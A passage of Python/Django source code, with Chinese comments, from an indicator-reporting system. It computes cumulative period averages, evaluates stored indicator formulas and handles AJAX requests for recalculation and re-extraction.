else:\n cumulativemonth = value\n else:\n cumulativemonth = (last_sum_data + value) / (day_count+1)\n\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (1, 4, 7, 10):\n cumulativequarter = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativequarter = (last_sum_data + value) / day_count\n else:\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (day_count+1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month in (1, 7):\n cumulativehalfyear = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count+1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n else:\n pass\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (4, 7, 10):\n cumulativequarter = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativequarter = (last_sum_data + value) / day_count\n else:\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (day_count + 1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month == 7:\n cumulativehalfyear = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count + 1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count + 1)\n else:\n pass\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3:\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count+1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n\n if target.cycletype == \"13\":\n # 半年报\n if date.month > 6:\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n if target.cycletype == \"14\":\n # 年报均为当前值\n pass\n\n try:\n cumulativemonth = round(cumulativemonth, target.digit)\n except:\n pass\n try:\n cumulativequarter = round(cumulativequarter, target.digit)\n except:\n pass\n try:\n cumulativehalfyear = round(cumulativehalfyear, target.digit)\n except:\n pass\n try:\n cumulativeyear = round(cumulativeyear, target.digit)\n except:\n pass\n return {\"cumulativemonth\": cumulativemonth, \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear, \"cumulativeyear\": cumulativeyear}\n\n\ndef getcalculatedata(target, date, guid, all_constant, all_target, tableList, forward=True):\n \"\"\"\n 数据计算\n @forward {bool}: 是否往前计算\n \"\"\"\n todayvalue = -9999\n if target.data_from == 'et':\n # 外部系统,直接取数\n # 从数据库中获取,取第一个值,其他情况抛错\n ret = Extract.getDataFromSource(target, date)\n if ret['result']:\n try:\n todayvalue = float(ret['result'][0][0])\n except Exception as e:\n print(e)\n else:\n pass\n else:\n formula = \"\"\n\n # 本地系统根据公式计算\n if target.formula is not None:\n formula = target.formula\n\n # 从公式中提取指标与d:D\n members = formula.split('>')\n for member in members:\n if member.replace(\" \", \"\") != \"\":\n col = \"d\"\n cond = \"D\"\n if (member.find('<') >= 0):\n membertarget = member[member.find('<') + 1:].replace(\" \", \"\")\n th = membertarget\n if membertarget.find(':') > 0:\n col = membertarget[membertarget.find(':') + 1:]\n membertarget = membertarget[0:membertarget.find(':')]\n if col.find(':') > 0:\n cond = col[col.find(':') + 1:]\n col = col[0:col.find(':')]\n\n # 查询常数库value值\n # 公式中取常数值,不存在则取指标值\n value = \"\"\n isconstant = False\n for constant in all_constant:\n if membertarget == constant['code']:\n value = constant['value']\n isconstant = True\n break\n if not isconstant:\n istarget = False\n newtarget = None\n for new_target in all_target:\n if membertarget == new_target.code:\n istarget = True\n newtarget = new_target\n break\n if not istarget or newtarget is None:\n formula = \"-9999\"\n break\n else:\n # 同一应用,同一周期,同一业务,计算操作类型,guid不同(未计算过)的指标,先计算\n # 即:当前指标由另一个公式中其他指标计算所得,'其他'指标值未计算出结果,先计算\n # A = B + 1 B未计算出,先计算出B\n membertarget = newtarget\n # 指标为加权指标先计算\n cumulative = membertarget.cumulative\n\n if forward:\n if cumulative == '3':\n wt_membertarget = membertarget.weight_target\n getcalculatedata(wt_membertarget, date, guid, all_constant, all_target, tableList)\n\n if membertarget.operationtype == target.operationtype and membertarget.adminapp_id == target.adminapp_id \\\n and membertarget.cycletype == target.cycletype and membertarget.work_id == target.work_id \\\n and membertarget.calculateguid != guid and not (cond.startswith('L') or cond.startswith('S')): # 判断指标公式非当前周期的数据:\n getcalculatedata(membertarget, date, guid, all_constant, all_target, tableList)\n\n # 取当年表\n queryset = tableList[\"Entrydata\"].objects\n operationtype = membertarget.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n # 取去年表\n if cond == \"LYS\" or cond == \"LYE\" or (\n (cond == \"LSS\" or cond == \"LSE\") and int(date.month) < 4) or (\n (cond == \"LHS\" or cond == \"LHE\") and int(date.month) < 7) or (\n (cond == \"LMS\" or cond == \"LME\" or cond == \"SLME\" or cond == \"ELME\") and int(date.month) < 2):\n tableyear = str(int(date.year) - 1)\n\n if operationtype == \"1\":\n queryset = getmodels(\"Meterdata\", tableyear).objects\n if operationtype == \"15\":\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if operationtype == \"16\":\n queryset = getmodels(\"Extractdata\", tableyear).objects\n if operationtype == \"17\":\n queryset = getmodels(\"Calculatedata\", tableyear).objects\n\n # 过滤时间\n condtions = {'datadate': date}\n if cond == \"D\":\n condtions = {'datadate': date}\n if cond == \"M\":\n condtions = {'datadate__year': date.year, 'datadate__month': date.month}\n if cond == \"Y\":\n condtions = {'datadate__year': date.year}\n if cond == \"L\": # 前一天\n newdate = date + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"N\": # 后一天\n newdate = date + datetime.timedelta(days=1)\n condtions = {'datadate': newdate}\n\n if cond == \"MS\":\n newdate = date.replace(day=1)\n condtions = {'datadate': newdate}\n if cond == \"ME\":\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month) # a,b——weekday的第一天是星期几(0-6对应星期一到星期天)和这个月的所有天数\n newdate = datetime.datetime(year=year, month=month, day=b) # 构造本月月末datetime\n condtions = {'datadate': newdate}\n\n # 上月末,当月为1月,则数据为0\n if cond == \"LME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n # 上月末,当月为1月,则取去年12月份数据\n if cond == \"ELME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"LMS\":\n date_now = date.replace(day=1)\n date_now = date_now + datetime.timedelta(days=-1)\n newdate = datetime.datetime(date_now.year, date_now.month, 1)\n condtions = {'datadate': newdate}\n\n if cond == \"YS\":\n newdate = date.replace(month=1, day=1)\n condtions = {'datadate': newdate}\n if cond == \"YE\":\n newdate = date.replace(month=12, day=31)\n condtions = {'datadate': newdate}\n if cond == \"LYS\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, 1, 1)\n condtions = {'datadate': newdate}\n if cond == \"LYE\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"SS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"SE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n if month == 10:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 3, 1) + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LSS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 2, 1)\n condtions = {'datadate': newdate}\n if cond == \"LSE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1 # 10\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"HS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"HE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n if month == 7:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 6, 1) + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LHS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 5, 1)\n condtions = {'datadate': newdate}\n if cond == \"LHE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"SLME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n new_date = \"\"\n if cond == \"MAVG\" or cond == \"MMAX\" or cond == \"MMIN\":\n ms_newdate = date.replace(day=1)\n me_newdate = date\n new_date = (ms_newdate, me_newdate)\n\n if cond == \"SAVG\" or cond == \"SMAX\" or cond == \"SMIN\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_newdate = datetime.datetime(date.year, month, 1)\n se_newdate = date\n new_date = (ss_newdate, se_newdate)\n\n if cond == \"HAVG\" or cond == \"HMAX\" or cond == \"HMIN\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_newdate = datetime.datetime(date.year, month, 1)\n he_newdate = date\n new_date = (hs_newdate, he_newdate)\n\n if cond == \"YAVG\" or cond == \"YMAX\" or cond == \"YMIN\":\n ys_newdate = date.replace(month=1, day=1)\n ye_newdate = date\n new_date = (ys_newdate, ye_newdate)\n\n query_res = []\n if condtions:\n newdate = condtions['datadate']\n query_res = queryset.filter(**condtions).filter(target=membertarget).exclude(state=\"9\")\n if new_date:\n query_res = queryset.filter(datadate__range=new_date).filter(\n target=membertarget).exclude(state=\"9\")\n if len(query_res) <= 0:\n value = 0\n else:\n # 获取季累计、年累计等字段值\n value = 0\n if col == 'd':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('curvalue'))[\"curvalue__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('curvalue'))[\"curvalue__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('curvalue'))[\"curvalue__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]: # 时间为本季上月末且当是每一季度第一个月的时候,值为0\n value = 0\n elif cond == \"LME\" and newdate.month == 12: # 上个月为12月,则当月为1月。时间为上月末且当是第一个月的时候,值为0\n value = 0\n else:\n value = query_res[0].curvalue\n if col == 'm':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativemonth'))[\"cumulativemonth__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativemonth'))[\"cumulativemonth__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativemonth'))[\"cumulativemonth__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativemonth\n if col == 's':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativequarter'))[\"cumulativequarter__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativequarter'))[\"cumulativequarter__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativequarter'))[\"cumulativequarter__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativequarter\n if col == 'h':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativehalfyear'))[\n \"cumulativehalfyear__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativehalfyear'))[\n \"cumulativehalfyear__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativehalfyear'))[\n \"cumulativehalfyear__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativehalfyear\n if col == 'y':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = query_res.aggregate(Avg('cumulativeyear'))[\"cumulativeyear__avg\"]\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = query_res.aggregate(Max('cumulativeyear'))[\"cumulativeyear__max\"]\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = query_res.aggregate(Min('cumulativeyear'))[\"cumulativeyear__min\"]\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = 0\n elif cond == \"LME\" and newdate.month == 12:\n value = 0\n else:\n value = query_res[0].cumulativeyear\n # 公式中指标替换成值\n formula = formula.replace(\"<\" + th + \">\", str(value))\n\n # 根据公式计算出值\n try:\n todayvalue = eval(formula)\n except:\n pass\n\n calculatedata = tableList[\"Calculatedata\"].objects.exclude(state=\"9\").filter(target_id=target.id).filter(\n datadate=date)\n if len(calculatedata) > 0:\n calculatedata = calculatedata[0]\n else:\n calculatedata = tableList[\"Calculatedata\"]()\n calculatedata.target = target\n calculatedata.datadate = date\n # 根据倍率与保留位数得出最后的值\n calculatedata.todayvalue = todayvalue\n calculatedata.todayvalue = decimal.Decimal(str(float(calculatedata.todayvalue))) * decimal.Decimal(\n str(float(target.magnification)))\n calculatedata.todayvalue = decimal.Decimal(str(calculatedata.todayvalue)).quantize(decimal.Decimal(Digit(target.digit)),\n rounding=decimal.ROUND_HALF_UP)\n calculatedata.judgevalue = 0\n calculatedata.releasestate = ''\n calculatedata.curvalue = calculatedata.todayvalue + calculatedata.judgevalue\n\n # 累计值计算\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, date, decimal.Decimal(str(calculatedata.curvalue)))\n calculatedata.cumulativemonth = cumulative[\"cumulativemonth\"]\n calculatedata.cumulativequarter = cumulative[\"cumulativequarter\"]\n calculatedata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n calculatedata.cumulativeyear = cumulative[\"cumulativeyear\"]\n # 保存最终计算公式\n calculatedata.formula = target.formula\n calculatedata.save()\n # 保存该次计算guid,不再参与本次计算\n target.calculateguid = guid\n target.save()\n\n\ndef ajax_cumulate(request):\n if request.user.is_authenticated():\n cur_value = request.POST.get('cur_value', '')\n target_id = request.POST.get('target_id', '')\n reporting_date = request.POST.get('reporting_date', '')\n cycletype = request.POST.get('cycletype', '')\n result = {}\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n result['status'] = 0\n result['data'] = \"报表日期处理出错。\"\n else:\n try:\n target = Target.objects.get(id=int(target_id))\n except:\n result['status'] = 0\n result['data'] = \"当前指标不存在。\"\n else:\n tableyear = str(reporting_date.year)\n tableList = {\n \"Entrydata\": getmodels(\"Entrydata\", tableyear),\n \"Meterdata\": getmodels(\"Meterdata\", tableyear),\n \"Extractdata\": getmodels(\"Extractdata\", tableyear),\n \"Calculatedata\": getmodels(\"Calculatedata\", tableyear)\n }\n\n cumulative = getcumulative(tableList, target, reporting_date, decimal.Decimal(str(cur_value)))\n cumulativemonth = cumulative[\"cumulativemonth\"]\n cumulativequarter = cumulative[\"cumulativequarter\"]\n cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n cumulativeyear = cumulative[\"cumulativeyear\"]\n\n result['status'] = 1\n result['data'] = {\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear\n }\n\n return JsonResponse(result)\n else:\n return HttpResponseRedirect('/login')\n\n\ndef single_reextract(request):\n \"\"\"\n 对单个指标重新提取\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"重新提取成功\"\n\n target_id = request.POST.get(\"target_id\", \"\")\n reporting_date = request.POST.get('reporting_date', '')\n\n try:\n c_target = Target.objects.get(id=int(target_id))\n except:\n status = 0\n info = \"当前指标不存在\"\n else:\n cycletype = c_target.cycletype\n operationtype = c_target.operationtype\n\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n status = 0\n info = \"时间处理异常\"\n else:\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target_id=c_target.id).filter(datadate=reporting_date)\n if len(extractdata) > 0:\n extractdata = extractdata[0]\n # tablename = \"\"\n # try:\n # tablename = c_target.storage.tablename\n # except:\n # pass\n #\n # rows = []\n # if tablename:\n # try:\n # with connection.cursor() as cursor:\n # reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n # strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n # tablename=tablename, target_id=c_target.id, datadate=reporting_date_stf\n # )\n # cursor.execute(strsql)\n # rows = cursor.fetchall()\n # connection.close()\n # except Exception as e:\n # pass\n # if len(rows) > 0:\n # try:\n # if c_target.is_repeat == '2':\n # rownum = 0\n # rowvalue = 0\n # for row in rows:\n # if row[0] is not None:\n # rowvalue += row[0]\n # rownum += 1\n # extractdata.todayvalue = rowvalue / rownum\n # else:\n # extractdata.todayvalue = rows[0][0]\n # extractdata.todayvalue = decimal.Decimal(\n # float(extractdata.todayvalue) * float(c_target.magnification))\n # extractdata.todayvalue = round(extractdata.todayvalue, c_target.digit)\n # except:\n # pass\n # if not rows or not c_target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(c_target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if c_target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(extractdata.todayvalue)\n extractdata.todayvalue = round(extractdata.todayvalue, c_target.digit)\n except Exception as e:\n info = str(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if c_target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, c_target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n info = \"{0}{1}\".format(c_target.name, info)\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n })\n\n\ndef recalculate_targets_formula_contains(target, date, guid, all_constant, all_target, tableList, contains_self=True):\n \"\"\"\n 重新计算包括当前指标的计算指标\n @param target:\n @param date:\n @param guid: 一致表示参与过计算\n @param all_constant:\n @param all_target:\n @param tableList:\n @param contains_self: 是否重新计算当前指标\n @return:\n \"\"\"\n try:\n all_targets = all_target.exclude(calculateguid=guid)\n if contains_self: # 计算当前指标\n getcalculatedata(target, date, guid, all_constant, all_target, tableList, forward=False)\n\n # 后续指标\n for t in all_targets:\n if t.operationtype == \"17\":\n ts_contained = get_targets_from_formula(t.formula)\n if target.code in ts_contained and t.calculateguid != guid:\n recalculate_targets_formula_contains(t, date, guid, all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n return False\n return True\n\n\ndef single_recalculate(request):\n if request.user.is_authenticated():\n target_id = request.POST.get(\"target_id\", \"\")\n reporting_date = request.POST.get('reporting_date', '')\n recalculate_type = request.POST.get('recalculate_type', '')\n status = 1\n info = \"重新计算成功\"\n try:\n c_target = Target.objects.get(id=int(target_id))\n except:\n status = 0\n info = \"当前指标不存在\"\n else:\n cycletype = c_target.cycletype\n operationtype = c_target.operationtype\n\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n status = 0\n info = \"时间处理异常\"\n else:\n if operationtype == \"17\":\n guid = uuid.uuid1()\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\n \"Entrydata\": EntryTable,\n \"Meterdata\": MeterTable,\n \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable\n }\n\n if recalculate_type == \"1\":\n ret = recalculate_targets_formula_contains(c_target, reporting_date, guid, all_constant, all_target, tableList)\n else:\n ret = recalculate_targets_formula_contains(c_target, reporting_date, guid, all_constant, all_target, tableList, contains_self=False)\n if not ret:\n status = 0\n info = \"指标{0}重新计算失败\".format(c_target.name)\n else:\n status = 0\n info = \"该指标不是计算指标\"\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n })\n\n\ndef reporting_formulacalculate(request):\n if request.user.is_authenticated():\n id = request.POST.get('id', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n try:\n id = int(id)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return HttpResponse(0)\n date = reporting_date\n\n all_constant = Constant.objects.exclude(state=\"9\")\n constant_codename = {}\n for constant in all_constant:\n code = constant.code\n name = constant.name\n constant_codename[code] = name\n\n all_target = Target.objects.exclude(state=\"9\")\n target_codename = {}\n for target in all_target:\n code = target.code\n name = target.name\n target_codename[code] = name\n data_field = {\"d\": \"当前值\", \"m\": \"月累积\", \"s\": \"季累积\", \"h\": \"半年累积\", \"y\": \"年累积\", \"c\": \"常数\"}\n data_time = {\n \"D\": \"当天\", \"L\": \"前一天\",\"N\": \"后一天\", \"MS\": \"月初\", \"ME\": \"月末\", \"LMS\": \"上月初\", \"LME\": \"上月末\", \"ELME\": \"上月末(连续)\",\n \"SS\": \"季初\", \"SE\": \"季末\", \"LSS\": \"上季初\", \"LSE\": \"上季末\", \"HS\": \"半年初\", \"HE\": \"半年末\",\n \"LHS\": \"前个半年初\", \"LHE\": \"前个半年末\", \"YS\": \"年初\", \"YE\": \"年末\", \"LYS\": \"去年初\",\n \"LYE\": \"去年末\", \"MAVG\": \"月平均值\", \"SAVG\": \"季平均值\", \"HAVG\": \"半年平均值\", \"YAVG\": \"年均值\",\n \"MMAX\": \"月最大值\", \"MMIN\": \"月最小值\", \"SMAX\": \"季最大值\", \"SMIN\": \"季最小值\",\n \"HMAX\": \"半年最大值\", \"HMIN\": \"半年最小值\", \"YMAX\": \"年最大值\", \"YMIN\": \"年最小值\", \"SLME\": \"本季上月末\"\n }\n\n calculatedata = getmodels(\"Calculatedata\", str(date.year)).objects.exclude(state=\"9\").filter(\n id=id).select_related(\"target\")\n if len(calculatedata) > 0:\n formula = calculatedata[0].formula\n target = calculatedata[0].target\n data_from = target.data_from if target else 'lc'\n\n if data_from == 'lc':\n if formula is not None:\n formula = formula.replace(\" \", \"\")\n formula_chinese = formula + \" = \" + str(round(calculatedata[0].curvalue, calculatedata[0].target.digit))\n members = formula.split('>')\n for member in members:\n if member.replace(\" \", \"\") != \"\":\n if (member.find('<') >= 0):\n col = \"d\"\n cond = \"D\"\n membertarget = member[member.find('<') + 1:]\n target_english = '<' + membertarget + '>'\n if membertarget.find(':') > 0:\n col = membertarget[membertarget.find(':') + 1:]\n membertarget = membertarget[0:membertarget.find(':')]\n if col.find(':') > 0:\n cond = col[col.find(':') + 1:]\n col = col[0:col.find(':')]\n\n value = \"\"\n if membertarget in constant_codename:\n constant_name = constant_codename[membertarget]\n constant_col = data_field[col]\n memberconstant = Constant.objects.filter(code=membertarget).exclude(state=\"9\")\n if len(memberconstant) <= 0:\n value = 0\n else:\n memberconstant = memberconstant[0]\n value = memberconstant.value\n value = \"{:f}\".format(decimal.Decimal(str(value) if str(value) else \"0\").normalize())\n constant_chinese = '<' + constant_name + ':' + constant_col + '>(' + value + ')'\n formula_chinese = formula_chinese.replace(target_english, constant_chinese)\n\n else:\n target_name = membertarget\n try:\n target_name = target_codename[membertarget]\n except:\n pass\n target_col = data_field[col]\n target_cond = data_time[cond]\n\n membertarget = Target.objects.filter(code=membertarget).exclude(state=\"9\")\n\n childid = None\n if len(membertarget) <= 0:\n value = \"指标不存在\"\n else:\n membertarget = membertarget[0]\n\n tableyear = str(date.year)\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if cond == \"LYS\" or cond == \"LYE\" or (\n (cond == \"LSS\" or cond == \"LSE\") and int(date.month) < 4) or (\n (cond == \"LHS\" or cond == \"LHE\") and int(date.month) < 7) or (\n (cond == \"LMS\" or cond == \"LME\" or cond == \"SLME\" or cond == \"ELME\") and int(date.month) < 2):\n tableyear = str(int(date.year) - 1)\n operationtype = membertarget.operationtype\n if operationtype == \"1\":\n queryset = getmodels(\"Meterdata\", tableyear).objects\n if operationtype == \"15\":\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if operationtype == \"16\":\n queryset = getmodels(\"Extractdata\", tableyear).objects\n if operationtype == \"17\":\n queryset = getmodels(\"Calculatedata\", tableyear).objects\n condtions = {'datadate': date}\n if cond == 